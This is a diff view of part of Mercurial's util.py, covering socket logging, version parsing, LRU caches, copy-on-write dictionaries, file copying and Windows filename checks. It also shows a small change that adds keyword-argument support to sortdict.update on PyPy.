1064 1064 if not self.writes:
1065 1065 return
1066 1066
1067 1067 if address:
1068 1068 flags = flagsoraddress
1069 1069 else:
1070 1070 flags = 0
1071 1071
1072 1072 if self.logdataapis:
1073 1073 self.fh.write(
1074 1074 b'%s> sendto(%d, %d, %r) -> %d'
1075 1075 % (self.name, len(data), flags, address, res)
1076 1076 )
1077 1077
1078 1078 self._writedata(data)
1079 1079
1080 1080 def setblocking(self, res, flag):
1081 1081 if not self.states:
1082 1082 return
1083 1083
1084 1084 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1085 1085
1086 1086 def settimeout(self, res, value):
1087 1087 if not self.states:
1088 1088 return
1089 1089
1090 1090 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1091 1091
1092 1092 def gettimeout(self, res):
1093 1093 if not self.states:
1094 1094 return
1095 1095
1096 1096 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1097 1097
1098 1098 def setsockopt(self, res, level, optname, value):
1099 1099 if not self.states:
1100 1100 return
1101 1101
1102 1102 self.fh.write(
1103 1103 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1104 1104 % (self.name, level, optname, value, res)
1105 1105 )
1106 1106
1107 1107
1108 1108 def makeloggingsocket(
1109 1109 logh,
1110 1110 fh,
1111 1111 name,
1112 1112 reads=True,
1113 1113 writes=True,
1114 1114 states=True,
1115 1115 logdata=False,
1116 1116 logdataapis=True,
1117 1117 ):
1118 1118 """Turn a socket into a logging socket."""
1119 1119
1120 1120 observer = socketobserver(
1121 1121 logh,
1122 1122 name,
1123 1123 reads=reads,
1124 1124 writes=writes,
1125 1125 states=states,
1126 1126 logdata=logdata,
1127 1127 logdataapis=logdataapis,
1128 1128 )
1129 1129 return socketproxy(fh, observer)
1130 1130
1131 1131
1132 1132 def version():
1133 1133 """Return version information if available."""
1134 1134 try:
1135 1135 from . import __version__
1136 1136
1137 1137 return __version__.version
1138 1138 except ImportError:
1139 1139 return b'unknown'
1140 1140
1141 1141
1142 1142 def versiontuple(v=None, n=4):
1143 1143 """Parses a Mercurial version string into an N-tuple.
1144 1144
1145 1145 The version string to be parsed is specified with the ``v`` argument.
1146 1146 If it isn't defined, the current Mercurial version string will be parsed.
1147 1147
1148 1148 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1149 1149 returned values:
1150 1150
1151 1151 >>> v = b'3.6.1+190-df9b73d2d444'
1152 1152 >>> versiontuple(v, 2)
1153 1153 (3, 6)
1154 1154 >>> versiontuple(v, 3)
1155 1155 (3, 6, 1)
1156 1156 >>> versiontuple(v, 4)
1157 1157 (3, 6, 1, '190-df9b73d2d444')
1158 1158
1159 1159 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1160 1160 (3, 6, 1, '190-df9b73d2d444+20151118')
1161 1161
1162 1162 >>> v = b'3.6'
1163 1163 >>> versiontuple(v, 2)
1164 1164 (3, 6)
1165 1165 >>> versiontuple(v, 3)
1166 1166 (3, 6, None)
1167 1167 >>> versiontuple(v, 4)
1168 1168 (3, 6, None, None)
1169 1169
1170 1170 >>> v = b'3.9-rc'
1171 1171 >>> versiontuple(v, 2)
1172 1172 (3, 9)
1173 1173 >>> versiontuple(v, 3)
1174 1174 (3, 9, None)
1175 1175 >>> versiontuple(v, 4)
1176 1176 (3, 9, None, 'rc')
1177 1177
1178 1178 >>> v = b'3.9-rc+2-02a8fea4289b'
1179 1179 >>> versiontuple(v, 2)
1180 1180 (3, 9)
1181 1181 >>> versiontuple(v, 3)
1182 1182 (3, 9, None)
1183 1183 >>> versiontuple(v, 4)
1184 1184 (3, 9, None, 'rc+2-02a8fea4289b')
1185 1185
1186 1186 >>> versiontuple(b'4.6rc0')
1187 1187 (4, 6, None, 'rc0')
1188 1188 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1189 1189 (4, 6, None, 'rc0+12-425d55e54f98')
1190 1190 >>> versiontuple(b'.1.2.3')
1191 1191 (None, None, None, '.1.2.3')
1192 1192 >>> versiontuple(b'12.34..5')
1193 1193 (12, 34, None, '..5')
1194 1194 >>> versiontuple(b'1.2.3.4.5.6')
1195 1195 (1, 2, 3, '.4.5.6')
1196 1196 """
1197 1197 if not v:
1198 1198 v = version()
1199 1199 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1200 1200 if not m:
1201 1201 vparts, extra = b'', v
1202 1202 elif m.group(2):
1203 1203 vparts, extra = m.groups()
1204 1204 else:
1205 1205 vparts, extra = m.group(1), None
1206 1206
1207 1207 assert vparts is not None # help pytype
1208 1208
1209 1209 vints = []
1210 1210 for i in vparts.split(b'.'):
1211 1211 try:
1212 1212 vints.append(int(i))
1213 1213 except ValueError:
1214 1214 break
1215 1215 # (3, 6) -> (3, 6, None)
1216 1216 while len(vints) < 3:
1217 1217 vints.append(None)
1218 1218
1219 1219 if n == 2:
1220 1220 return (vints[0], vints[1])
1221 1221 if n == 3:
1222 1222 return (vints[0], vints[1], vints[2])
1223 1223 if n == 4:
1224 1224 return (vints[0], vints[1], vints[2], extra)
1225 1225
1226 1226
1227 1227 def cachefunc(func):
1228 1228 '''cache the result of function calls'''
1229 1229 # XXX doesn't handle keywords args
1230 1230 if func.__code__.co_argcount == 0:
1231 1231 listcache = []
1232 1232
1233 1233 def f():
1234 1234 if len(listcache) == 0:
1235 1235 listcache.append(func())
1236 1236 return listcache[0]
1237 1237
1238 1238 return f
1239 1239 cache = {}
1240 1240 if func.__code__.co_argcount == 1:
1241 1241 # we gain a small amount of time because
1242 1242 # we don't need to pack/unpack the list
1243 1243 def f(arg):
1244 1244 if arg not in cache:
1245 1245 cache[arg] = func(arg)
1246 1246 return cache[arg]
1247 1247
1248 1248 else:
1249 1249
1250 1250 def f(*args):
1251 1251 if args not in cache:
1252 1252 cache[args] = func(*args)
1253 1253 return cache[args]
1254 1254
1255 1255 return f
1256 1256
1257 1257
1258 1258 class cow(object):
1259 1259 """helper class to make copy-on-write easier
1260 1260
1261 1261 Call preparewrite before doing any writes.
1262 1262 """
1263 1263
1264 1264 def preparewrite(self):
1265 1265 """call this before writes, return self or a copied new object"""
1266 1266 if getattr(self, '_copied', 0):
1267 1267 self._copied -= 1
1268 1268 return self.__class__(self)
1269 1269 return self
1270 1270
1271 1271 def copy(self):
1272 1272 """always do a cheap copy"""
1273 1273 self._copied = getattr(self, '_copied', 0) + 1
1274 1274 return self
1275 1275
1276 1276
1277 1277 class sortdict(collections.OrderedDict):
1278 1278 """a simple sorted dictionary
1279 1279
1280 1280 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1281 1281 >>> d2 = d1.copy()
1282 1282 >>> d2
1283 1283 sortdict([('a', 0), ('b', 1)])
1284 1284 >>> d2.update([(b'a', 2)])
1285 1285 >>> list(d2.keys()) # should still be in last-set order
1286 1286 ['b', 'a']
1287 1287 >>> d1.insert(1, b'a.5', 0.5)
1288 1288 >>> d1
1289 1289 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1290 1290 """
1291 1291
1292 1292 def __setitem__(self, key, value):
1293 1293 if key in self:
1294 1294 del self[key]
1295 1295 super(sortdict, self).__setitem__(key, value)
1296 1296
1297 1297 if pycompat.ispypy:
1298 1298 # __setitem__() isn't called as of PyPy 5.8.0
1299 def update(self, src):
1299 def update(self, src, **f):
1300 1300 if isinstance(src, dict):
1301 1301 src = pycompat.iteritems(src)
1302 1302 for k, v in src:
1303 1303 self[k] = v
1304 for k in f:
1305 self[k] = f[k]
1304 1306
1305 1307 def insert(self, position, key, value):
1306 1308 for (i, (k, v)) in enumerate(list(self.items())):
1307 1309 if i == position:
1308 1310 self[key] = value
1309 1311 if i >= position:
1310 1312 del self[k]
1311 1313 self[k] = v
1312 1314
1313 1315
1314 1316 class cowdict(cow, dict):
1315 1317 """copy-on-write dict
1316 1318
1317 1319 Be sure to call d = d.preparewrite() before writing to d.
1318 1320
1319 1321 >>> a = cowdict()
1320 1322 >>> a is a.preparewrite()
1321 1323 True
1322 1324 >>> b = a.copy()
1323 1325 >>> b is a
1324 1326 True
1325 1327 >>> c = b.copy()
1326 1328 >>> c is a
1327 1329 True
1328 1330 >>> a = a.preparewrite()
1329 1331 >>> b is a
1330 1332 False
1331 1333 >>> a is a.preparewrite()
1332 1334 True
1333 1335 >>> c = c.preparewrite()
1334 1336 >>> b is c
1335 1337 False
1336 1338 >>> b is b.preparewrite()
1337 1339 True
1338 1340 """
1339 1341
1340 1342
1341 1343 class cowsortdict(cow, sortdict):
1342 1344 """copy-on-write sortdict
1343 1345
1344 1346 Be sure to call d = d.preparewrite() before writing to d.
1345 1347 """
1346 1348
1347 1349
1348 1350 class transactional(object): # pytype: disable=ignored-metaclass
1349 1351 """Base class for making a transactional type into a context manager."""
1350 1352
1351 1353 __metaclass__ = abc.ABCMeta
1352 1354
1353 1355 @abc.abstractmethod
1354 1356 def close(self):
1355 1357 """Successfully closes the transaction."""
1356 1358
1357 1359 @abc.abstractmethod
1358 1360 def release(self):
1359 1361 """Marks the end of the transaction.
1360 1362
1361 1363 If the transaction has not been closed, it will be aborted.
1362 1364 """
1363 1365
1364 1366 def __enter__(self):
1365 1367 return self
1366 1368
1367 1369 def __exit__(self, exc_type, exc_val, exc_tb):
1368 1370 try:
1369 1371 if exc_type is None:
1370 1372 self.close()
1371 1373 finally:
1372 1374 self.release()
1373 1375
1374 1376
1375 1377 @contextlib.contextmanager
1376 1378 def acceptintervention(tr=None):
1377 1379 """A context manager that closes the transaction on InterventionRequired
1378 1380
1379 1381 If no transaction was provided, this simply runs the body and returns
1380 1382 """
1381 1383 if not tr:
1382 1384 yield
1383 1385 return
1384 1386 try:
1385 1387 yield
1386 1388 tr.close()
1387 1389 except error.InterventionRequired:
1388 1390 tr.close()
1389 1391 raise
1390 1392 finally:
1391 1393 tr.release()
1392 1394
1393 1395
1394 1396 @contextlib.contextmanager
1395 1397 def nullcontextmanager(enter_result=None):
1396 1398 yield enter_result
1397 1399
1398 1400
1399 1401 class _lrucachenode(object):
1400 1402 """A node in a doubly linked list.
1401 1403
1402 1404 Holds a reference to nodes on either side as well as a key-value
1403 1405 pair for the dictionary entry.
1404 1406 """
1405 1407
1406 1408 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1407 1409
1408 1410 def __init__(self):
1409 1411 self.next = None
1410 1412 self.prev = None
1411 1413
1412 1414 self.key = _notset
1413 1415 self.value = None
1414 1416 self.cost = 0
1415 1417
1416 1418 def markempty(self):
1417 1419 """Mark the node as emptied."""
1418 1420 self.key = _notset
1419 1421 self.value = None
1420 1422 self.cost = 0
1421 1423
1422 1424
1423 1425 class lrucachedict(object):
1424 1426 """Dict that caches most recent accesses and sets.
1425 1427
1426 1428 The dict consists of an actual backing dict - indexed by original
1427 1429 key - and a doubly linked circular list defining the order of entries in
1428 1430 the cache.
1429 1431
1430 1432 The head node is the newest entry in the cache. If the cache is full,
1431 1433 we recycle head.prev and make it the new head. Cache accesses result in
1432 1434 the node being moved to before the existing head and being marked as the
1433 1435 new head node.
1434 1436
1435 1437 Items in the cache can be inserted with an optional "cost" value. This is
1436 1438 simply an integer that is specified by the caller. The cache can be queried
1437 1439 for the total cost of all items presently in the cache.
1438 1440
1439 1441 The cache can also define a maximum cost. If a cache insertion would
1440 1442 cause the total cost of the cache to go beyond the maximum cost limit,
1441 1443 nodes will be evicted to make room for the new code. This can be used
1442 1444 to e.g. set a max memory limit and associate an estimated bytes size
1443 1445 cost to each item in the cache. By default, no maximum cost is enforced.
1444 1446 """
1445 1447
1446 1448 def __init__(self, max, maxcost=0):
1447 1449 self._cache = {}
1448 1450
1449 1451 self._head = head = _lrucachenode()
1450 1452 head.prev = head
1451 1453 head.next = head
1452 1454 self._size = 1
1453 1455 self.capacity = max
1454 1456 self.totalcost = 0
1455 1457 self.maxcost = maxcost
1456 1458
1457 1459 def __len__(self):
1458 1460 return len(self._cache)
1459 1461
1460 1462 def __contains__(self, k):
1461 1463 return k in self._cache
1462 1464
1463 1465 def __iter__(self):
1464 1466 # We don't have to iterate in cache order, but why not.
1465 1467 n = self._head
1466 1468 for i in range(len(self._cache)):
1467 1469 yield n.key
1468 1470 n = n.next
1469 1471
1470 1472 def __getitem__(self, k):
1471 1473 node = self._cache[k]
1472 1474 self._movetohead(node)
1473 1475 return node.value
1474 1476
1475 1477 def insert(self, k, v, cost=0):
1476 1478 """Insert a new item in the cache with optional cost value."""
1477 1479 node = self._cache.get(k)
1478 1480 # Replace existing value and mark as newest.
1479 1481 if node is not None:
1480 1482 self.totalcost -= node.cost
1481 1483 node.value = v
1482 1484 node.cost = cost
1483 1485 self.totalcost += cost
1484 1486 self._movetohead(node)
1485 1487
1486 1488 if self.maxcost:
1487 1489 self._enforcecostlimit()
1488 1490
1489 1491 return
1490 1492
1491 1493 if self._size < self.capacity:
1492 1494 node = self._addcapacity()
1493 1495 else:
1494 1496 # Grab the last/oldest item.
1495 1497 node = self._head.prev
1496 1498
1497 1499 # At capacity. Kill the old entry.
1498 1500 if node.key is not _notset:
1499 1501 self.totalcost -= node.cost
1500 1502 del self._cache[node.key]
1501 1503
1502 1504 node.key = k
1503 1505 node.value = v
1504 1506 node.cost = cost
1505 1507 self.totalcost += cost
1506 1508 self._cache[k] = node
1507 1509 # And mark it as newest entry. No need to adjust order since it
1508 1510 # is already self._head.prev.
1509 1511 self._head = node
1510 1512
1511 1513 if self.maxcost:
1512 1514 self._enforcecostlimit()
1513 1515
1514 1516 def __setitem__(self, k, v):
1515 1517 self.insert(k, v)
1516 1518
1517 1519 def __delitem__(self, k):
1518 1520 self.pop(k)
1519 1521
1520 1522 def pop(self, k, default=_notset):
1521 1523 try:
1522 1524 node = self._cache.pop(k)
1523 1525 except KeyError:
1524 1526 if default is _notset:
1525 1527 raise
1526 1528 return default
1527 1529
1528 1530 assert node is not None # help pytype
1529 1531 value = node.value
1530 1532 self.totalcost -= node.cost
1531 1533 node.markempty()
1532 1534
1533 1535 # Temporarily mark as newest item before re-adjusting head to make
1534 1536 # this node the oldest item.
1535 1537 self._movetohead(node)
1536 1538 self._head = node.next
1537 1539
1538 1540 return value
1539 1541
1540 1542 # Additional dict methods.
1541 1543
1542 1544 def get(self, k, default=None):
1543 1545 try:
1544 1546 return self.__getitem__(k)
1545 1547 except KeyError:
1546 1548 return default
1547 1549
1548 1550 def peek(self, k, default=_notset):
1549 1551 """Get the specified item without moving it to the head
1550 1552
1551 1553 Unlike get(), this doesn't mutate the internal state. But be aware
1552 1554 that it doesn't mean peek() is thread safe.
1553 1555 """
1554 1556 try:
1555 1557 node = self._cache[k]
1556 1558 return node.value
1557 1559 except KeyError:
1558 1560 if default is _notset:
1559 1561 raise
1560 1562 return default
1561 1563
1562 1564 def clear(self):
1563 1565 n = self._head
1564 1566 while n.key is not _notset:
1565 1567 self.totalcost -= n.cost
1566 1568 n.markempty()
1567 1569 n = n.next
1568 1570
1569 1571 self._cache.clear()
1570 1572
1571 1573 def copy(self, capacity=None, maxcost=0):
1572 1574 """Create a new cache as a copy of the current one.
1573 1575
1574 1576 By default, the new cache has the same capacity as the existing one.
1575 1577 But, the cache capacity can be changed as part of performing the
1576 1578 copy.
1577 1579
1578 1580 Items in the copy have an insertion/access order matching this
1579 1581 instance.
1580 1582 """
1581 1583
1582 1584 capacity = capacity or self.capacity
1583 1585 maxcost = maxcost or self.maxcost
1584 1586 result = lrucachedict(capacity, maxcost=maxcost)
1585 1587
1586 1588 # We copy entries by iterating in oldest-to-newest order so the copy
1587 1589 # has the correct ordering.
1588 1590
1589 1591 # Find the first non-empty entry.
1590 1592 n = self._head.prev
1591 1593 while n.key is _notset and n is not self._head:
1592 1594 n = n.prev
1593 1595
1594 1596 # We could potentially skip the first N items when decreasing capacity.
1595 1597 # But let's keep it simple unless it is a performance problem.
1596 1598 for i in range(len(self._cache)):
1597 1599 result.insert(n.key, n.value, cost=n.cost)
1598 1600 n = n.prev
1599 1601
1600 1602 return result
1601 1603
1602 1604 def popoldest(self):
1603 1605 """Remove the oldest item from the cache.
1604 1606
1605 1607 Returns the (key, value) describing the removed cache entry.
1606 1608 """
1607 1609 if not self._cache:
1608 1610 return
1609 1611
1610 1612 # Walk the linked list backwards starting at tail node until we hit
1611 1613 # a non-empty node.
1612 1614 n = self._head.prev
1613 1615 while n.key is _notset:
1614 1616 n = n.prev
1615 1617
1616 1618 assert n is not None # help pytype
1617 1619
1618 1620 key, value = n.key, n.value
1619 1621
1620 1622 # And remove it from the cache and mark it as empty.
1621 1623 del self._cache[n.key]
1622 1624 self.totalcost -= n.cost
1623 1625 n.markempty()
1624 1626
1625 1627 return key, value
1626 1628
1627 1629 def _movetohead(self, node):
1628 1630 """Mark a node as the newest, making it the new head.
1629 1631
1630 1632 When a node is accessed, it becomes the freshest entry in the LRU
1631 1633 list, which is denoted by self._head.
1632 1634
1633 1635 Visually, let's make ``N`` the new head node (* denotes head):
1634 1636
1635 1637 previous/oldest <-> head <-> next/next newest
1636 1638
1637 1639 ----<->--- A* ---<->-----
1638 1640 | |
1639 1641 E <-> D <-> N <-> C <-> B
1640 1642
1641 1643 To:
1642 1644
1643 1645 ----<->--- N* ---<->-----
1644 1646 | |
1645 1647 E <-> D <-> C <-> B <-> A
1646 1648
1647 1649 This requires the following moves:
1648 1650
1649 1651 C.next = D (node.prev.next = node.next)
1650 1652 D.prev = C (node.next.prev = node.prev)
1651 1653 E.next = N (head.prev.next = node)
1652 1654 N.prev = E (node.prev = head.prev)
1653 1655 N.next = A (node.next = head)
1654 1656 A.prev = N (head.prev = node)
1655 1657 """
1656 1658 head = self._head
1657 1659 # C.next = D
1658 1660 node.prev.next = node.next
1659 1661 # D.prev = C
1660 1662 node.next.prev = node.prev
1661 1663 # N.prev = E
1662 1664 node.prev = head.prev
1663 1665 # N.next = A
1664 1666 # It is tempting to do just "head" here, however if node is
1665 1667 # adjacent to head, this will do bad things.
1666 1668 node.next = head.prev.next
1667 1669 # E.next = N
1668 1670 node.next.prev = node
1669 1671 # A.prev = N
1670 1672 node.prev.next = node
1671 1673
1672 1674 self._head = node
1673 1675
1674 1676 def _addcapacity(self):
1675 1677 """Add a node to the circular linked list.
1676 1678
1677 1679 The new node is inserted before the head node.
1678 1680 """
1679 1681 head = self._head
1680 1682 node = _lrucachenode()
1681 1683 head.prev.next = node
1682 1684 node.prev = head.prev
1683 1685 node.next = head
1684 1686 head.prev = node
1685 1687 self._size += 1
1686 1688 return node
1687 1689
1688 1690 def _enforcecostlimit(self):
1689 1691 # This should run after an insertion. It should only be called if total
1690 1692 # cost limits are being enforced.
1691 1693 # The most recently inserted node is never evicted.
1692 1694 if len(self) <= 1 or self.totalcost <= self.maxcost:
1693 1695 return
1694 1696
1695 1697 # This is logically equivalent to calling popoldest() until we
1696 1698 # free up enough cost. We don't do that since popoldest() needs
1697 1699 # to walk the linked list and doing this in a loop would be
1698 1700 # quadratic. So we find the first non-empty node and then
1699 1701 # walk nodes until we free up enough capacity.
1700 1702 #
1701 1703 # If we only removed the minimum number of nodes to free enough
1702 1704 # cost at insert time, chances are high that the next insert would
1703 1705 # also require pruning. This would effectively constitute quadratic
1704 1706 # behavior for insert-heavy workloads. To mitigate this, we set a
1705 1707 # target cost that is a percentage of the max cost. This will tend
1706 1708 # to free more nodes when the high water mark is reached, which
1707 1709 # lowers the chances of needing to prune on the subsequent insert.
1708 1710 targetcost = int(self.maxcost * 0.75)
1709 1711
1710 1712 n = self._head.prev
1711 1713 while n.key is _notset:
1712 1714 n = n.prev
1713 1715
1714 1716 while len(self) > 1 and self.totalcost > targetcost:
1715 1717 del self._cache[n.key]
1716 1718 self.totalcost -= n.cost
1717 1719 n.markempty()
1718 1720 n = n.prev
1719 1721
1720 1722
1721 1723 def lrucachefunc(func):
1722 1724 '''cache most recent results of function calls'''
1723 1725 cache = {}
1724 1726 order = collections.deque()
1725 1727 if func.__code__.co_argcount == 1:
1726 1728
1727 1729 def f(arg):
1728 1730 if arg not in cache:
1729 1731 if len(cache) > 20:
1730 1732 del cache[order.popleft()]
1731 1733 cache[arg] = func(arg)
1732 1734 else:
1733 1735 order.remove(arg)
1734 1736 order.append(arg)
1735 1737 return cache[arg]
1736 1738
1737 1739 else:
1738 1740
1739 1741 def f(*args):
1740 1742 if args not in cache:
1741 1743 if len(cache) > 20:
1742 1744 del cache[order.popleft()]
1743 1745 cache[args] = func(*args)
1744 1746 else:
1745 1747 order.remove(args)
1746 1748 order.append(args)
1747 1749 return cache[args]
1748 1750
1749 1751 return f
1750 1752
1751 1753
1752 1754 class propertycache(object):
1753 1755 def __init__(self, func):
1754 1756 self.func = func
1755 1757 self.name = func.__name__
1756 1758
1757 1759 def __get__(self, obj, type=None):
1758 1760 result = self.func(obj)
1759 1761 self.cachevalue(obj, result)
1760 1762 return result
1761 1763
1762 1764 def cachevalue(self, obj, value):
1763 1765 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1764 1766 obj.__dict__[self.name] = value
1765 1767
1766 1768
1767 1769 def clearcachedproperty(obj, prop):
1768 1770 '''clear a cached property value, if one has been set'''
1769 1771 prop = pycompat.sysstr(prop)
1770 1772 if prop in obj.__dict__:
1771 1773 del obj.__dict__[prop]
1772 1774
1773 1775
1774 1776 def increasingchunks(source, min=1024, max=65536):
1775 1777 """return no less than min bytes per chunk while data remains,
1776 1778 doubling min after each chunk until it reaches max"""
1777 1779
1778 1780 def log2(x):
1779 1781 if not x:
1780 1782 return 0
1781 1783 i = 0
1782 1784 while x:
1783 1785 x >>= 1
1784 1786 i += 1
1785 1787 return i - 1
1786 1788
1787 1789 buf = []
1788 1790 blen = 0
1789 1791 for chunk in source:
1790 1792 buf.append(chunk)
1791 1793 blen += len(chunk)
1792 1794 if blen >= min:
1793 1795 if min < max:
1794 1796 min = min << 1
1795 1797 nmin = 1 << log2(blen)
1796 1798 if nmin > min:
1797 1799 min = nmin
1798 1800 if min > max:
1799 1801 min = max
1800 1802 yield b''.join(buf)
1801 1803 blen = 0
1802 1804 buf = []
1803 1805 if buf:
1804 1806 yield b''.join(buf)
1805 1807
1806 1808
1807 1809 def always(fn):
1808 1810 return True
1809 1811
1810 1812
1811 1813 def never(fn):
1812 1814 return False
1813 1815
1814 1816
1815 1817 def nogc(func):
1816 1818 """disable garbage collector
1817 1819
1818 1820 Python's garbage collector triggers a GC each time a certain number of
1819 1821 container objects (the number being defined by gc.get_threshold()) are
1820 1822 allocated even when marked not to be tracked by the collector. Tracking has
1821 1823 no effect on when GCs are triggered, only on what objects the GC looks
1822 1824 into. As a workaround, disable GC while building complex (huge)
1823 1825 containers.
1824 1826
1825 1827 This garbage collector issue have been fixed in 2.7. But it still affect
1826 1828 CPython's performance.
1827 1829 """
1828 1830
1829 1831 def wrapper(*args, **kwargs):
1830 1832 gcenabled = gc.isenabled()
1831 1833 gc.disable()
1832 1834 try:
1833 1835 return func(*args, **kwargs)
1834 1836 finally:
1835 1837 if gcenabled:
1836 1838 gc.enable()
1837 1839
1838 1840 return wrapper
1839 1841
1840 1842
1841 1843 if pycompat.ispypy:
1842 1844 # PyPy runs slower with gc disabled
1843 1845 nogc = lambda x: x
1844 1846
1845 1847
1846 1848 def pathto(root, n1, n2):
1847 1849 # type: (bytes, bytes, bytes) -> bytes
1848 1850 """return the relative path from one place to another.
1849 1851 root should use os.sep to separate directories
1850 1852 n1 should use os.sep to separate directories
1851 1853 n2 should use "/" to separate directories
1852 1854 returns an os.sep-separated path.
1853 1855
1854 1856 If n1 is a relative path, it's assumed it's
1855 1857 relative to root.
1856 1858 n2 should always be relative to root.
1857 1859 """
1858 1860 if not n1:
1859 1861 return localpath(n2)
1860 1862 if os.path.isabs(n1):
1861 1863 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1862 1864 return os.path.join(root, localpath(n2))
1863 1865 n2 = b'/'.join((pconvert(root), n2))
1864 1866 a, b = splitpath(n1), n2.split(b'/')
1865 1867 a.reverse()
1866 1868 b.reverse()
1867 1869 while a and b and a[-1] == b[-1]:
1868 1870 a.pop()
1869 1871 b.pop()
1870 1872 b.reverse()
1871 1873 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1872 1874
1873 1875
1874 1876 def checksignature(func, depth=1):
1875 1877 '''wrap a function with code to check for calling errors'''
1876 1878
1877 1879 def check(*args, **kwargs):
1878 1880 try:
1879 1881 return func(*args, **kwargs)
1880 1882 except TypeError:
1881 1883 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1882 1884 raise error.SignatureError
1883 1885 raise
1884 1886
1885 1887 return check
1886 1888
1887 1889
1888 1890 # a whilelist of known filesystems where hardlink works reliably
1889 1891 _hardlinkfswhitelist = {
1890 1892 b'apfs',
1891 1893 b'btrfs',
1892 1894 b'ext2',
1893 1895 b'ext3',
1894 1896 b'ext4',
1895 1897 b'hfs',
1896 1898 b'jfs',
1897 1899 b'NTFS',
1898 1900 b'reiserfs',
1899 1901 b'tmpfs',
1900 1902 b'ufs',
1901 1903 b'xfs',
1902 1904 b'zfs',
1903 1905 }
1904 1906
1905 1907
1906 1908 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1907 1909 """copy a file, preserving mode and optionally other stat info like
1908 1910 atime/mtime
1909 1911
1910 1912 checkambig argument is used with filestat, and is useful only if
1911 1913 destination file is guarded by any lock (e.g. repo.lock or
1912 1914 repo.wlock).
1913 1915
1914 1916 copystat and checkambig should be exclusive.
1915 1917 """
1916 1918 assert not (copystat and checkambig)
1917 1919 oldstat = None
1918 1920 if os.path.lexists(dest):
1919 1921 if checkambig:
1920 1922 oldstat = checkambig and filestat.frompath(dest)
1921 1923 unlink(dest)
1922 1924 if hardlink:
1923 1925 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1924 1926 # unless we are confident that dest is on a whitelisted filesystem.
1925 1927 try:
1926 1928 fstype = getfstype(os.path.dirname(dest))
1927 1929 except OSError:
1928 1930 fstype = None
1929 1931 if fstype not in _hardlinkfswhitelist:
1930 1932 hardlink = False
1931 1933 if hardlink:
1932 1934 try:
1933 1935 oslink(src, dest)
1934 1936 return
1935 1937 except (IOError, OSError):
1936 1938 pass # fall back to normal copy
1937 1939 if os.path.islink(src):
1938 1940 os.symlink(os.readlink(src), dest)
1939 1941 # copytime is ignored for symlinks, but in general copytime isn't needed
1940 1942 # for them anyway
1941 1943 else:
1942 1944 try:
1943 1945 shutil.copyfile(src, dest)
1944 1946 if copystat:
1945 1947 # copystat also copies mode
1946 1948 shutil.copystat(src, dest)
1947 1949 else:
1948 1950 shutil.copymode(src, dest)
1949 1951 if oldstat and oldstat.stat:
1950 1952 newstat = filestat.frompath(dest)
1951 1953 if newstat.isambig(oldstat):
1952 1954 # stat of copied file is ambiguous to original one
1953 1955 advanced = (
1954 1956 oldstat.stat[stat.ST_MTIME] + 1
1955 1957 ) & 0x7FFFFFFF
1956 1958 os.utime(dest, (advanced, advanced))
1957 1959 except shutil.Error as inst:
1958 1960 raise error.Abort(stringutil.forcebytestr(inst))
1959 1961
1960 1962
1961 1963 def copyfiles(src, dst, hardlink=None, progress=None):
1962 1964 """Copy a directory tree using hardlinks if possible."""
1963 1965 num = 0
1964 1966
1965 1967 def settopic():
1966 1968 if progress:
1967 1969 progress.topic = _(b'linking') if hardlink else _(b'copying')
1968 1970
1969 1971 if os.path.isdir(src):
1970 1972 if hardlink is None:
1971 1973 hardlink = (
1972 1974 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1973 1975 )
1974 1976 settopic()
1975 1977 os.mkdir(dst)
1976 1978 for name, kind in listdir(src):
1977 1979 srcname = os.path.join(src, name)
1978 1980 dstname = os.path.join(dst, name)
1979 1981 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1980 1982 num += n
1981 1983 else:
1982 1984 if hardlink is None:
1983 1985 hardlink = (
1984 1986 os.stat(os.path.dirname(src)).st_dev
1985 1987 == os.stat(os.path.dirname(dst)).st_dev
1986 1988 )
1987 1989 settopic()
1988 1990
1989 1991 if hardlink:
1990 1992 try:
1991 1993 oslink(src, dst)
1992 1994 except (IOError, OSError):
1993 1995 hardlink = False
1994 1996 shutil.copy(src, dst)
1995 1997 else:
1996 1998 shutil.copy(src, dst)
1997 1999 num += 1
1998 2000 if progress:
1999 2001 progress.increment()
2000 2002
2001 2003 return hardlink, num
2002 2004
2003 2005
2004 2006 _winreservednames = {
2005 2007 b'con',
2006 2008 b'prn',
2007 2009 b'aux',
2008 2010 b'nul',
2009 2011 b'com1',
2010 2012 b'com2',
2011 2013 b'com3',
2012 2014 b'com4',
2013 2015 b'com5',
2014 2016 b'com6',
2015 2017 b'com7',
2016 2018 b'com8',
2017 2019 b'com9',
2018 2020 b'lpt1',
2019 2021 b'lpt2',
2020 2022 b'lpt3',
2021 2023 b'lpt4',
2022 2024 b'lpt5',
2023 2025 b'lpt6',
2024 2026 b'lpt7',
2025 2027 b'lpt8',
2026 2028 b'lpt9',
2027 2029 }
2028 2030 _winreservedchars = b':*?"<>|'
2029 2031
2030 2032
2031 2033 def checkwinfilename(path):
2032 2034 # type: (bytes) -> Optional[bytes]
2033 2035 r"""Check that the base-relative path is a valid filename on Windows.
2034 2036 Returns None if the path is ok, or a UI string describing the problem.
2035 2037
2036 2038 >>> checkwinfilename(b"just/a/normal/path")
2037 2039 >>> checkwinfilename(b"foo/bar/con.xml")
2038 2040 "filename contains 'con', which is reserved on Windows"
2039 2041 >>> checkwinfilename(b"foo/con.xml/bar")
2040 2042 "filename contains 'con', which is reserved on Windows"
2041 2043 >>> checkwinfilename(b"foo/bar/xml.con")
2042 2044 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2043 2045 "filename contains 'AUX', which is reserved on Windows"
